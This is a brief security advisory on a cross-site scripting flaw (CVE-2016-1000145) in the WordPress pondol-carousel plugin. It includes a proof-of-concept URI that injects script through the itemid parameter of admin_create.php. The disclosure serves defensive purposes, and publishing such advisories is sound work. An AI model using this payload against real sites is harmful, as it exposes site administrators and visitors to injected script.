WordPress pondol-carousel Plugin CVE-2016-1000145 Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/pondol-carousel/pages/admin_create.php?itemid=";</script><script>alert(1);</script>"


 

Privacy Statement
Copyright 2010, SecurityFocus